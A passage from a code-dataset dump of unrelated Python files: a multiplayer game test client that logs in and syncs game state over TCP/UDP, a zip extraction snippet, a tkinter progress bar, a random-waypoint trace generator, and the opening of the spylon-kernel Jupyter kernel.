self.udp_pack_size = None\n \n \n self.left_data_tcp = b\"\"\n self.left_data_udp = b\"\"\n self.pystress = False\n \n \n self.sync_delta = 0.0\n self.drag_back = 0\n self.max_dis = 0\n self.lastSyncTime = 0\n self.thisSyncTime = 0\n\n self.scenemsg_list = []\n self.udpsenemsg_list = []\n\n self.team_rank_list = None\n self.team_info = None\n\n self.cur_match_time = None\n self.next_match_time = None\n\n self.is_live = True\n\n if self.cfg[\"room\"][\"synctype\"] == 1:\n self.gameSync = gamesync.follow_ori.FollowSync()\n elif self.cfg[\"room\"][\"synctype\"] == 2:\n self.gameSync = gamesync.follow.FollowSync()\n elif self.cfg[\"room\"][\"synctype\"] == 3:\n self.gameSync = gamesync.follow_physics.FollowSync()\n elif self.cfg[\"room\"][\"synctype\"] == 4:\n self.gameSync = gamesync.mope.FollowSync()\n \n self.cmds = {}\n self.init_cmds()\n \n \n def init_cmds(self):\n self.cmds[proto.message.Wilds.Login.value] = self.on_wilds_login\n self.cmds[proto.message.Wilds.Top.value] = self.on_wilds_top\n self.cmds[proto.message.Wilds.AddPlayer.value] = self.on_wilds_add_player\n self.cmds[proto.message.Wilds.RemovePlayer.value] = self.on_wilds_remove_player\n self.cmds[proto.message.Wilds.Death.value] = self.on_wilds_death\n self.cmds[proto.message.Wilds.EndRoom.value] = self.on_end_room\n self.cmds[proto.message.Wilds.RefreshPlayer.value] = self.on_wilds_refresh_player\n self.cmds[proto.message.Wilds.SceneChat.value] = self.on_wilds_donothing\n self.cmds[proto.message.Wilds.ActCloseSocket.value] = self.on_exit_room\n self.cmds[proto.message.Wilds.VoiceInfo.value] = self.on_wilds_donothing\n self.cmds[proto.message.Wilds.CastSkill.value] = self.on_cast_skill\n self.cmds[proto.message.Wilds.HeartBeat.value] = self.on_wilds_donothing\n self.cmds[proto.message.Wilds.AsyncPlayerAnimal.value] = self.on_sync_player_animal\n self.cmds[proto.message.Wilds.UpdateTeamInfo.value] = self.on_update_team_info\n self.cmds[proto.message.Wilds.TeamRankList.value] = self.on_team_ranking_list\n self.cmds[proto.message.Wilds.ReLife.value] = self.on_relife\n self.cmds[proto.message.Wilds.SceneTCP.value] = self.on_wilds_scene_tcp\n if self.usedelay > 0:\n self.cmds[proto.message.Wilds.SceneUDP.value] = self.on_delay_udp_scene\n else:\n self.cmds[proto.message.Wilds.SceneUDP.value] = self.on_wilds_scene_udp\n \n def login(self):\n account = self.cfg[\"login\"][\"account\"]\n password = self.cfg[\"login\"][\"password\"]\n dev = self.cfg[\"login\"][\"dev\"]\n device = self.cfg[\"login\"][\"device\"]\n r = self.cfg[\"login\"][\"r\"]\n m = self.cfg[\"login\"][\"m\"]\n return self.login_detail(account, password, dev, device, r, m)\n \n def login_detail(self, account, password, dev, device, r, m):\n try:\n #like: http://127.0.0.1:8080/msg?c=1&a=BOS30000022&p=&ver=1.2.0&dev=4730d114e32c13359a112ce6cc17eebbd2073944&device=android&r=1&m=0&sign=7e343d61e73ecd3c600521ae9588c460\n \n c = proto.message.Player.Login.value\n sign = proto.message.get_sign(c)\n url = \"http://%s:%d/msg?c=%d&a=%s&p=%s&ver=%s&dev=%s&device=%s&r=%d&m=%d&sign=%s\" % (self.addr, self.port, c, account, password, self.ver, dev, device, r, m, sign)\n print(\"url=\", url)\n \n request = urllib.request.urlopen(url)\n result = request.read()\n \n self.cookie = request.getheader(\"Set-Cookie\")\n if self.cookie != \"\":\n self.cookie = self.cookie[self.cookie.find(\"=\")+1: self.cookie.find(\";\")]\n \n cmd, msg = proto.message.unpack(result)\n pmsg = proto.player_pb2.RetLoginMsg()\n pmsg.ParseFromString(msg)\n proto.myprint.print_login_result(pmsg)\n \n self.account_name = pmsg.Account\n self.id = pmsg.Id\n \n if pmsg.Id == 0:\n print(\"connect login server fail.\")\n return False\n \n # TODO: 暂时屏蔽登录gateway\n '''\n if self.pystress == False:\n if gateway.gate.login_gateway(self) == False:\n print(\"connect gateway server fail.\")\n return False\n '''\n \n except Exception as e:\n print(e)\n return False\n \n return True\n \n \n def req_room(self):\n \n if self.cookie == \"\":\n return False\n \n #like: http://127.0.0.1:8080/msg?c=3&ver=1.2.0&ticketnum=0&scene=1002&sign=tolower(md5(SIGNKEYc))\n \n c = proto.message.Player.ReqIntoFRoom.value\n sign = proto.message.get_sign(c)\n self.scene_id = scene = self.cfg[\"room\"][\"scene\"]\n url = \"http://%s:%d/msg?c=%d&ver=%s&ticketnum=%d&scene=%d&sign=%s\" % (self.addr, self.port, c, self.ver, 0, scene, sign)\n print(\"url=\", url)\n \n request = urllib.request.Request(url, headers={\"Cookie\":\"session=\"+self.cookie})\n result = urllib.request.urlopen(request).read()\n cmd, msg = proto.message.unpack(result)\n pmsg = proto.player_pb2.RetIntoFRoom()\n pmsg.ParseFromString(msg)\n proto.myprint.print_room_result(pmsg)\n \n if pmsg.Err == 0:\n self.room_server_addr = pmsg.Addr\n self.room_server_key = pmsg.Key\n \n return pmsg.Err == 0\n \n \n def connect_room_server(self):\n if self.room_server_addr == \"\" or self.room_server_key == \"\":\n print('self.room_server_addr == \"\" or or self.room_server_key == \"\"')\n return False\n \n host = self.room_server_addr[:self.room_server_addr.find(\":\")]\n port = int(self.room_server_addr[self.room_server_addr.find(\":\") + 1:])\n addr = (host, port)\n \n if self.client != None:\n socket_mgr.get_socket_set(\"tcp\").remove_sock(self.sockindex)\n self.client.close()\n self.client = None\n self.client = socket_mgr.get_socket_set(\"tcp\").add_sock(self.sockindex, SOCK_STREAM)\n \n try:\n self.client.connect(addr)\n except Exception as e:\n print(e)\n return False\n \n if self.udp_enable!=0:\n if self.udpclient != None:\n socket_mgr.get_socket_set(\"udp\").remove_sock(self.sockindex)\n self.udpclient.close()\n self.udpclient = None\n self.udpclient = socket_mgr.get_socket_set(\"udp\").add_sock(self.sockindex, SOCK_DGRAM)\n self.udpclient.connect(addr)\n\n return True\n \n \n def start_game(self):\n if self.client == None:\n print(\"restart ...\")\n self.terminate = False\n self.req_room()\n if self.connect_room_server() == False:\n return False\n time.sleep(0.02)\n \n print(\"call start_game #1\")\n \n pmsg = proto.wilds_pb2.MsgLogin()\n pmsg.name = \"%s_%d\" % (self.account_name, self.id)\n pmsg.key = self.room_server_key\n data = pmsg.SerializeToString()\n cmd = proto.message.Wilds.Login.value\n msg = proto.message.pack(cmd, data)\n if self.client != None:\n self.client.send(msg)\n ##todo:对时\n #self.match_time()\n \n print(\"call start_game #2\")\n \n #加载资源\n if self.pystress==False:\n self.res = res.new(self.args, self.cfg, self.scene_id)\n print(\"call start_game #3\")\n \n return True\n \n def move(self, angle, power):\n if self.face == self.old_face and self.old_power == power and self.old_way == angle:\n return\n self.old_face = self.face\n self.old_power = power\n self.old_way = angle\n \n pmsg = proto.wilds_pb2.MsgMove()\n pmsg.angle = angle\n pmsg.power = power\n pmsg.face = self.face\n data = pmsg.SerializeToString()\n cmd = proto.message.Wilds.Move.value\n msg = proto.message.pack(cmd, data)\n if self.client != None:\n self.client.send(msg)\n\n def run(self):\n pmsg = proto.wilds_pb2.MsgRun()\n data = pmsg.SerializeToString()\n cmd = proto.message.Wilds.Run.value\n msg = proto.message.pack(cmd, data)\n if self.client != None:\n self.client.send(msg)\n\n def relife(self):\n pmsg = proto.wilds_pb2.MsgRelife()\n data = pmsg.SerializeToString()\n cmd = proto.message.Wilds.ReLife.value\n msg = proto.message.pack(cmd, data)\n if self.client != None:\n self.client.send(msg)\n\n def bindTCPSession(self):\n pmsg = proto.wilds_pb2.MsgBindTCPSession()\n pmsg.id = self.id\n pmsg.key = self.room_server_key\n data = pmsg.SerializeToString()\n cmd = proto.message.Wilds.BindTCPSession.value\n msg = proto.message.pack(cmd, data)\n if self.client == None:\n return\n if self.udp_enable > 0 and self.udpclient != None:\n self.udpclient.sendall(msg)\n\n\n def cast_skill(self, skillId):\n pmsg = proto.wilds_pb2.MsgCastSkill()\n pmsg.skillid = skillId\n data = pmsg.SerializeToString()\n cmd = proto.message.Wilds.CastSkill.value\n msg = proto.message.pack(cmd, data)\n if self.client != None:\n self.client.send(msg)\n \n def heart_beat(self):\n cmd = proto.message.Wilds.HeartBeat.value\n msg = proto.message.pack(cmd, b\"\")\n if self.client != None:\n self.client.send(msg)\n \n def exit_room(self):\n cmd = proto.message.Wilds.ActCloseSocket.value\n msg = proto.message.pack(cmd, b\"\")\n if self.client != None:\n self.client.send(msg)\n\n def on_cast_skill(self, data):\n pass\n \n def on_sync_player_animal(self, data):\n pmsg = proto.wilds_pb2.MsgAsyncPlayerAnimal()\n pmsg.ParseFromString(data)\n \n self.mutex.acquire()\n if pmsg.id in self.players:\n player = self.players[pmsg.id]\n if player.ballId in self.playerballs:\n ball = self.playerballs[player.ballId]\n ball.level = pmsg.animalid\n self.mutex.release()\n \n \n def get_ball(self):\n self.mutex.acquire()\n ball = None\n if self.ball_id in self.playerballs:\n ball = self.playerballs[self.ball_id]\n self.mutex.release()\n return ball\n \n def on_recv(self, data, udp_channel=0):\n msgs = proto.message.on_recv(self, data, udp_channel)\n if len(msgs) == 0:\n return\n\n for (cmd, data) in msgs:\n self.on_recv_one(cmd, data, udp_channel)\n \n def on_recv_one(self, cmd, data, udp_channel=0):\n if cmd in self.cmds:\n self.cmds[cmd](data)\n else:\n print(\"cmd = \", cmd)\n if udp_channel != 0:\n self.udp_pack_size = len(data)\n\n \n def on_wilds_login(self, data):\n print(\"on_wilds_login\")\n pmsg = proto.wilds_pb2.MsgLoginResult()\n pmsg.ParseFromString(data)\n proto.myprint.print_wilds_login_result(pmsg)\n \n if pmsg.ok:\n self.player_name = pmsg.name\n self.ball_id = pmsg.ballId\n self.framemgr.set_frame(pmsg.frame)\n print(\"lefttime:\", pmsg.leftTime)\n self.room_end_time = pmsg.leftTime + round(time.time())\n \n self.mutex.acquire()\n \n for p in pmsg.others:\n player = proto.player_info.PlayerInfo(p)\n self.players[player.id] = player\n \n for pb in pmsg.playerballs:\n playerball = proto.player_ball_info.PlayerBallInfo(pb)\n self.playerballs[playerball.id] = playerball\n #print( \"add playerball =====================\" )\n #print( playerball.id )\n \n for b in pmsg.balls:\n ball = proto.ball_info.BallInfo(b)\n self.balls[ball.id] = ball\n \n if self.pystress==False:\n t = self.res.food[ball.type][\"type\"]\n if t == proto.wilds_pb2.FoodHammer or t == proto.wilds_pb2.FoodBomb:\n self.balls_bg[ball.id] = ball\n \n self.mutex.release()\n \n \n '''\n # 选动物\n if pmsg.IsFirstCross == False:\n pmsg = proto.wilds_pb2.MsgSelectAnimal()\n data = pmsg.SerializeToString()\n cmd = proto.message.Wilds.SelectAnimal.value\n msg = proto.message.pack(cmd, data)\n if self.client != None:\n self.client.send(msg)\n '''\n \n\n # 绑定TCP连接\n if self.kcp_enable > 0 or self.udp_enable > 0:\n self.bindTCPSession()\n \n if self.pystress==False:\n mainwindow.open_room_window(self)\n \n else:\n print(\"start game fail\")\n \n def on_wilds_top(self, data):\n pmsg = proto.wilds_pb2.MsgTop()\n pmsg.ParseFromString(data)\n self.mutex.acquire()\n self.top = proto.top_info.TopInfo(pmsg)\n self.mutex.release()\n \n def on_wilds_add_player(self, data):\n pmsg = proto.wilds_pb2.MsgAddPlayer()\n pmsg.ParseFromString(data)\n player = proto.player_info.PlayerInfo(pmsg.player)\n \n self.mutex.acquire()\n self.players[player.id] = player\n self.mutex.release()\n \n def on_wilds_remove_player(self, data):\n pmsg = proto.wilds_pb2.MsgRemovePlayer()\n pmsg.ParseFromString(data)\n \n self.mutex.acquire()\n if pmsg.id in self.players:\n player = self.players[pmsg.id]\n if player.ballId in self.playerballs:\n self.playerballs.pop(player.ballId)\n self.players.pop(pmsg.id)\n self.mutex.release()\n\n\n def on_delay_scene(self, data):\n self.mutex.acquire()\n self.scenemsg_list.append((int(round(time.time() * 1000)), data)) \n self.mutex.release()\n\n def on_delay_udp_scene(self, data):\n self.mutex.acquire()\n self.udpsenemsg_list.append((int(round(time.time() * 1000)), data))\n self.mutex.release()\n\n def sync_udpscene(self):\n if len(self.udpsenemsg_list) == 0:\n return\n (t, data) = self.udpsenemsg_list[0]\n Now = int(round(time.time() * 1000))\n delay = random.uniform(self.delaymin, self.delaymax)\n if Now - t >= delay:\n self.on_wilds_scene_udp(data)\n self.udpsenemsg_list.pop(0)\n\n def on_wilds_scene_tcp(self, data):\n pmsg = proto.wilds_pb2.MsgSceneTCP()\n pmsg.ParseFromString(data)\n \n self.mutex.acquire()\n for bid in pmsg.removes:\n if bid in self.balls:\n self.balls.pop(bid)\n for b in pmsg.adds:\n ball = proto.ball_info.BallInfo(b)\n \n if ball.id in self.balls:\n if self.pystress==False:\n print(\"add ball, but ball already exist!!!!! ball_id =\", ball.id, \"ball_type =\", self.res.food[ball.type][\"type\"])\n \n self.balls[ball.id] = ball\n if self.pystress==False:\n t = self.res.food[ball.type][\"type\"]\n if t == proto.wilds_pb2.FoodHammer or t == proto.wilds_pb2.FoodBomb:\n self.balls_bg[ball.id] = ball\n \n if ball.id in self.no_find_ball:\n self.no_find_ball.pop(ball.id)\n \n for pbid in pmsg.removePlayers:\n #print( \"remove playerball ===================== #2\" )\n if pbid in self.playerballs:\n self.playerballs.pop(pbid)\n #print( \"remove playerball ===================== #1\" )\n #print( pbid )\n for pb in pmsg.addPlayers:\n playerball = proto.player_ball_info.PlayerBallInfo(pb)\n \n if playerball.id in self.playerballs:\n print(\"add player ball, but player ball already exist!!!!! ball_id =\", playerball.id)\n \n self.playerballs[playerball.id] = playerball\n #print( \"add playerball =====================\" )\n #print( playerball.id )\n \n if playerball.id in self.no_find_ball:\n self.no_find_ball.pop(playerball.id)\n \n playerball.server_pre_x = playerball.x\n playerball.server_pre_y = playerball.y\n playerball.client_pre_x = playerball.x\n playerball.client_pre_y = playerball.y\n playerball.server_now_x = playerball.x\n playerball.server_now_y = playerball.y\n playerball.client_now_x = playerball.x\n playerball.client_now_y = playerball.y\n \n for e in pmsg.eats:\n if e.target in self.balls:\n #print (self.balls[e.target], e.target)\n self.balls.pop(e.target)\n\n for hit in pmsg.hits:\n if hit.target in self.playerballs:\n ball = self.playerballs[hit.target]\n ball.hp = hit.curHp\n self.mutex.release()\n\n def on_wilds_scene_udp(self, data):\n pmsg = proto.wilds_pb2.MsgSceneUDP()\n pmsg.ParseFromString(data)\n\n frame = self.framemgr.get_pre_frame()\n if pmsg.frame < frame:\n return\n \n self.framemgr.set_frame(pmsg.frame)\n \n self.mutex.acquire()\n # print(\"bigdevil_ballid \", self.bigdevil_ballid)\n for m in pmsg.moves:\n ball = None\n if m.id in self.playerballs:\n ball = self.playerballs[m.id]\n ball.isplayer = True\n elif m.id in self.balls:\n ball = self.balls[m.id]\n ball.isplayer = False\n else:\n pass\n #print(\"no find ball. id = \", m.id)\n \n #self.no_find_ball[m.id] = m\n \n \n if ball != None:\n ball.state = m.state\n ball.angle = m.angle\n ball.face = m.face\n\n ball.server_pre_x = ball.server_now_x\n ball.server_pre_y = ball.server_now_y\n ball.client_pre_x = ball.client_now_x\n ball.client_pre_y = ball.client_now_y\n ball.server_now_x = m.x\n ball.server_now_y = m.y\n ball.client_now_x = ball.x\n ball.client_now_y = ball.y\n \n if (ball.id == self.ball_id and self.is_live == True) or (ball.id != self.ball_id):\n self.gameSync.SyncMove(ball, m, None, self.cur_match_time)\n \n self.mutex.release()\n \n def on_wilds_death(self, data):\n pmsg = proto.wilds_pb2.MsgDeath()\n pmsg.ParseFromString(data)\n \n if pmsg.Id == self.id:\n self.is_live = False\n if self.pystress==False:\n wx.CallAfter(wx.MessageBox, \"你已经挂了,请点击复活按钮,继续战斗!\", \"提示\", wx.OK | wx.ICON_INFORMATION)\n else:\n pass\n \n def on_end_room(self, data):\n if self.pystress==False:\n wx.CallAfter(self.on_end_room_detail)\n \n \n def on_end_room_detail(self):\n if self.pystress==False:\n wx.MessageBox(\"本局游戏结束!\", \"提示\", wx.OK | wx.ICON_INFORMATION)\n self.on_exit_room(None)\n \n def allstop(self):\n for k,v in self.playerballs.items():\n v.vx = 0\n v.vy = 0\n \n def on_wilds_refresh_player(self, data):\n pmsg = proto.wilds_pb2.MsgRefreshPlayer()\n pmsg.ParseFromString(data)\n player = proto.player_info.PlayerInfo(pmsg.player)\n \n self.mutex.acquire()\n self.players[player.id] = player\n\n if player.ballId in self.playerballs:\n ball = self.playerballs[player.ballId]\n ball.hp = player.curhp\n ball.curmp = player.curmp\n ball.curexp = player.curexp\n # print(\"hp:\", player.curhp, \" curmp:\", player.curmp)\n\n self.mutex.release()\n \n def on_exit_room(self, data):\n self.on_exit_room_clear_data()\n if self.pystress==False:\n mainwindow.close_room_window(self)\n \n def on_exit_room_clear_data(self):\n self.mutex.acquire()\n self.players = {}\n self.playerballs = {}\n self.balls = {}\n self.balls_bg = {}\n self.top = None\n self.no_find_ball = {}\n self.mutex.release()\n \n def on_wilds_donothing(self, data):\n pass\n\n def on_hit(self, data):\n pmsg = proto.wilds_pb2.HitMsg()\n pmsg.ParseFromString(data)\n proto.myprint.print_hit_msg(pmsg)\n\n def on_update_team_info(self, data):\n pmsg = proto.wilds_pb2.UpdateTeamInfoMsg()\n pmsg.ParseFromString(data)\n \n self.team_info = []\n for mem in pmsg.members:\n if mem.playerid in self.players:\n player = self.players[mem.playerid]\n self.team_info.append((mem.playerid, mem.x * 100, mem.y * 100, player.ballId))\n else:\n self.team_info.append((mem.playerid, mem.x * 100, mem.y * 100, 0))\n self.team_info.sort(key=lambda a:a[0])\n\n # for mem in pmsg.members:\n # print(\"mem id: \", mem.playerid, \" (\", mem.x, \",\", mem.y, \")\")\n # for mem in pmsg.topPlayers:\n # print(\"top id: \", mem.playerid, \" (\", mem.x, \",\", mem.y, \")\")\n\n def on_team_ranking_list(self, data):\n pmsg = proto.wilds_pb2.RetTeamRankList()\n pmsg.ParseFromString(data)\n self.team_rank_list = pmsg\n # for team in pmsg.Teams:\n # print(\"team name: \", team.Tname, \" num: \", team.Num, \" CorpName: \", team.CorpName, \" score: \", team.Score, \" last rank: \", team.LastRank)\n # print(\"Watch num: \", pmsg.WatchNum, \" EndTime: \", pmsg.EndTime, \" KillNum: \", pmsg.killNum)\n\n def on_relife(self, data):\n pmsg = proto.wilds_pb2.MsgS2CRelife()\n pmsg.ParseFromString(data)\n \n if pmsg.SnapInfo.Id == self.id:\n self.is_live = True\n self.mutex.acquire()\n self.framemgr.set_frame(pmsg.frame)\n self.playerballs = {}\n self.balls = {}\n self.balls_bg = {}\n self.mutex.release()\n\n\n def is_same_team(self, ballId):\n if self.team_info == None:\n return False\n else:\n for mem in self.team_info:\n if mem[3] == ballId:\n return True\n return False \n\n\n def match_time(self):\n self.mutex.acquire()\n if self.cur_match_time != None and self.cur_match_time.GetDelay() < 10:\n self.mutex.release()\n return\n if self.next_match_time == None or int(time.time() * 1000) - self.next_match_time.local_send_time >= 1000:\n cmd = proto.message.Wilds.MatchTime.value\n msg = proto.message.pack(cmd, b\"\")\n if self.client != None:\n self.client.send(msg)\n if self.next_match_time == None:\n self.next_match_time = matchtime.MatchTime(int(time.time() * 1000))\n else:\n self.next_match_time.local_send_time = int(time.time() * 1000)\n # print(\"\\n\")\n # print(\"`````local_send_time:\", self.next_match_time.local_send_time)\n # print(\"`````server_time:\", self.next_match_time.server_time)\n # print(\"`````local_recv_time:\", self.next_match_time.local_recv_time)\n self.mutex.release()\n \n \n def close(self):\n self.terminate = True\n if self.client != None:\n self.client.close()\n socket_mgr.get_socket_set(\"tcp\").remove_sock(self.sockindex)\n self.client = None\n if gateway.gate.gateClient != None:\n gateway.gate.gateClient.close()\n gateway.gate.gateClient = None\n if self.udpclient != None:\n self.udpclient.close()\n socket_mgr.get_socket_set(\"udp\").remove_sock(self.sockindex)\n self.udpclient = None\n ","sub_path":"server.match/tools/py_guiclient/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":27059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"408759659","text":"import zipfile, os\n\ndest_path = os.path.join(os.getcwd(), 'extracted')\n\nmyZip = zipfile.ZipFile('myZip.zip')\n# Extract single file in zip\nmyZip.extract('hello.txt')\n# Extract everything in the zip, to a new directory\nmyZip.extractall(dest_path)\nprint(\"Extracted\")","sub_path":"030-zipfile-extract/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"508824793","text":"\nclass Status:\n def __init__(self, parent=tk.Tk()):\n self.percent_complete = 0\n self.root = parent\n self.root.title(\"Status of your face!\")\n self.root.configure(bg=\"black\")\n self.root.geometry(\"%dx%d+0+0\" % (250, 80))\n self.label = tk.Label(master=self.root, text=\"Working on it, just wait a minute.\", bg=\"black\", fg=\"white\")\n self.label.grid(column=0,row=0, sticky=\"n\")\n self.loadingbar = tk.Canvas(master=self.root)\n self.loadingbar.configure(height=20, width=200, bg=\"black\")\n self.loadingbar.grid(column=0,row=1)\n\n def five_percent(self):\n self.percent_complete += .05\n self.create_box(self.loadingbar, int(self.percent_complete*200))\n\n def create_box(self, canvas, top_left):\n canvas.create_line(top_left, 0, top_left-10, 0, fill=\"white\")\n canvas.create_line(top_left-10, 0, top_left-10, 20, fill=\"white\")\n canvas.create_line(top_left, 0, top_left, 20, fill=\"white\")\n canvas.create_line(top_left, 20, top_left-10, 20, fill=\"white\")\n\n def terminate(self):\n self.root.destroy()\n","sub_path":"fun/MandelbrotViewer/progressbar.py","file_name":"progressbar.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"591719719","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass RandomWayPoint(object):\n def __init__(self, steps, x_range, y_range):\n np.random.seed()\n self.steps = steps\n self.pause_max = 5\n self.x_min = x_range[0]\n self.x_max = x_range[1]\n self.y_min = y_range[0]\n self.y_max = y_range[1]\n\n def generate_trace(self, start_coor):\n \"\"\"accord modified version of the RWP to generate trace data\"\"\"\n trace_data = []\n start_x = start_coor[0]\n start_y = start_coor[1]\n dest_x, dest_y = self._generate_dest_area()\n velo = self._generate_velo()\n step = self.steps\n while step > 0:\n part_trace, step_remain = self._generate_part_trace(start_x, start_y,\n dest_x, dest_y, velo, step_limit=step)\n\n trace_data.extend(part_trace)\n if step_remain == 0:\n break\n step = step_remain\n pause_t = self._generate_pause(step)\n last_coor = trace_data[-1]\n for p in range(pause_t):\n trace_data.append(last_coor)\n step -= pause_t\n start_x = trace_data[-1][0]\n start_y = trace_data[-1][1]\n dest_x, dest_y = self._generate_dest_area()\n velo = self._generate_velo()\n return np.array(trace_data)\n\n def _generate_part_trace(self, start_x, start_y, dest_x, dest_y, velo, step_limit):\n \"\"\"accord modified version of the RWP to generate the part trace data\"\"\"\n part_trace = []\n\n step_remain = step_limit\n next_x, next_y = start_x, start_y\n angle = np.arctan2(dest_y - start_y, dest_x - start_x)\n step_x = velo * np.cos(angle)\n step_y = velo * np.sin(angle)\n\n for step in range(step_limit, 0, -1):\n step_remain -= 1\n if np.abs(next_x - dest_x) < np.abs(step_x):\n next_x = dest_x\n next_y = dest_y\n part_trace.append(np.array([next_x, next_y]))\n break\n else:\n next_x += step_x\n next_y += step_y\n part_trace.append(np.array([next_x, next_y]))\n return part_trace, step_remain\n\n def _generate_dest_area(self):\n \"\"\"generate a random dest area locating in limited area\"\"\"\n pro = np.random.rand()\n if pro > 0.35:\n dest_x = np.random.uniform(self.x_min, self.x_max)\n dest_y = np.random.uniform(self.y_min, self.y_max)\n elif 0.15 < pro <= 0.35:\n dest_x = int(np.random.uniform(self.x_min, self.x_max)) + 0.01\n dest_y = int(np.random.uniform(self.y_min, self.y_max)) + 0.01\n else:\n type = np.random.randint(0, 4)\n if type == 0:\n dest_x = np.random.uniform(self.x_min, self.x_max)\n dest_y = self.y_min + 0.01\n elif type == 1:\n dest_x = self.x_max - 0.01\n dest_y = np.random.uniform(self.y_min, self.y_max)\n elif type == 2:\n dest_x = np.random.uniform(self.x_min, self.x_max)\n dest_y = self.y_max - 0.01\n else:\n dest_x = self.x_min + 0.01\n dest_y = np.random.uniform(self.y_min, self.y_max)\n return dest_x, dest_y\n\n def _generate_pause(self, p_max):\n \"\"\"generate a pause time\"\"\"\n pause = np.random.randint(0, min(p_max, self.pause_max))\n return pause\n\n def _generate_velo(self):\n \"\"\"generate random velocity between v_min and v_max\"\"\"\n velo = np.random.uniform(0.3, 1.3) # every step cannot exceed a certain number\n return velo\n\n def _get_epsilon(self):\n return np.random.uniform(-0.1, 0.1)\n\n\ndef test_model():\n x_range = np.array([0, 11])\n y_range = np.array([0, 11])\n model = RandomWayPoint(steps=500, x_range=x_range, y_range=y_range)\n trace_data = model.generate_trace(start_coor=[1, 1])\n # draw generated trace data\n plt.ion()\n plt.show()\n plt.figure(0)\n plt.plot(trace_data[:, 0], trace_data[:, 1], 'r')\n plt.draw()\n plt.pause(10)\n\n\nif __name__ == '__main__':\n test_model()\n","sub_path":"RandomWayPoint.py","file_name":"RandomWayPoint.py","file_ext":"py","file_size_in_byte":4236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"452136665","text":"from __future__ import absolute_import, print_function, division\n\nimport asyncio\nimport os\nimport pathlib\nimport shutil\nimport sys\nimport atexit\nfrom tempfile import mkdtemp\nfrom metakernel import MetaKernel\nfrom metakernel.process_metakernel import TextOutput\n\nfrom tornado import gen\nfrom tornado import ioloop\n\nfrom spylon_kernel._scala_interpreter import ScalaException\nfrom .init_spark_magic import InitSparkMagic\nfrom .scala_magic import ScalaMagic\n\n\nclass SpylonKernel(MetaKernel):\n implementation = 'spylon-kernel'\n implementation_version = '1.0'\n language = 'scala'\n language_version = '0.1'\n banner = \"spylon-kernel - evaluates Scala statements and expressions.\"\n language_info = {\n 'mimetype': 'text/x-scala',\n 'name': 'scala',\n # ------ If different from 'language':\n 'codemirror_mode': \"text/x-scala\",\n 'pygments_lexer': 'scala',\n # 'version' : \"x.y.z\",\n 'file_extension': '.scala',\n 'help_links': MetaKernel.help_links,\n 'version': implementation_version,\n }\n kernel_json = {\n \"argv\": [\n sys.executable, \"-m\", \"spylon_kernel\", \"-f\", \"{connection_file}\"],\n \"display_name\": \"spylon-kernel\",\n \"env\": {\n \"SPARK_SUBMIT_OPTS\": \"-Dscala.usejavacp=true\",\n \"PYTHONUNBUFFERED\": \"1\",\n },\n \"language\": \"scala\",\n \"name\": \"spylon-kernel\"\n }\n\n def __init__(self, *args, **kwargs):\n super(SpylonKernel, self).__init__(*args, **kwargs)\n self.register_magics(ScalaMagic)\n self.register_magics(InitSparkMagic)\n\n tempdir = mkdtemp()\n atexit.register(shutil.rmtree, tempdir, True)\n self.tempdir = tempdir\n\n self._is_complete_ready = False\n self._scalamagic = self.line_magics['scala']\n assert isinstance(self._scalamagic, ScalaMagic)\n self._scalamagic._after_start_interpreter.append(self._initialize_pipes)\n self._scalamagic._after_start_interpreter.append(lambda: setattr(self, \"_is_complete_ready\", True))\n\n def __del__(self):\n shutil.rmtree(self.tempdir, ignore_errors=True)\n\n @property\n def pythonmagic(self):\n return self.line_magics['python']\n\n def get_usage(self):\n return \"This is spylon-kernel. It implements a Scala interpreter.\"\n\n def set_variable(self, name, value):\n \"\"\"\n Set a variable in the kernel language.\n \"\"\"\n # python_magic = self.line_magics['python']\n # python_magic.env[name] = value\n\n def get_variable(self, name):\n \"\"\"\n Get a variable from the kernel language.\n \"\"\"\n # python_magic = self.line_magics['python']\n # return python_magic.env.get(name, None)\n\n async def execute_scala_async(self, code, future):\n intp = self._scalamagic._get_scala_interpreter()\n loop = asyncio.get_event_loop()\n try:\n result = await loop.run_in_executor(intp.executor, intp.interpret, code)\n self.log.debug(\"execute scala done\")\n future.set_result(result)\n except Exception as e:\n future.set_exception(e)\n return\n\n def do_execute_direct(self, code, silent=False):\n loop = asyncio.get_event_loop()\n try:\n fut = asyncio.Future()\n asyncio.ensure_future(self.execute_scala_async(code, fut))\n res = loop.run_until_complete(fut)\n if res:\n return TextOutput(res)\n except ScalaException as e:\n return self.Error(e.scala_message)\n\n def get_completions(self, info):\n magic = self.line_magics['scala']\n return magic.get_completions(info)\n\n def get_kernel_help_on(self, info, level=0, none_on_fail=False):\n magic = self.line_magics['scala']\n return magic.get_help_on(info, level, none_on_fail)\n\n def do_is_complete(self, code):\n \"\"\"\n Given code as string, returns dictionary with 'status' representing\n whether code is ready to evaluate. Possible values for status are:\n\n 'complete' - ready to evaluate\n 'incomplete' - not yet ready\n 'invalid' - invalid code\n 'unknown' - unknown; the default unless overridden\n\n Optionally, if 'status' is 'incomplete', you may indicate\n an indentation string.\n\n Example:\n\n return {'status' : 'incomplete',\n 'indent': ' ' * 4}\n \"\"\"\n if code.startswith(self.magic_prefixes['magic']) or not self._is_complete_ready:\n # force requirement to end with an empty line\n if code.endswith(\"\\n\"):\n return {'status': 'complete', 'indent': ''}\n else:\n return {'status': 'incomplete', 'indent': ''}\n # The scala interpreter can take a while to be alive, only use the fancy method when we dont need to lazily\n # instantiate the interpreter\n # otherwise, how to know is complete?\n magic = self.line_magics['scala']\n assert isinstance(magic, ScalaMagic)\n interp = magic._get_scala_interpreter()\n status = interp.is_complete(code)\n # TODO: Better indent\n return {'status': status, 'indent': ' ' * 4 if status == 'incomplete' else ''}\n\n def _initialize_pipes(self):\n STDOUT = os.path.abspath(os.path.join(self.tempdir, 'stdout'))\n STDERR = os.path.abspath(os.path.join(self.tempdir, 'stderr'))\n # Start up the pipes on the JVM side\n self.log.critical(\"STDOUT %s\", STDOUT)\n magic = self.line_magics['scala']\n\n self.log.critical(\"Before Java redirected\")\n code = 'Console.set{pipe}(new PrintStream(new 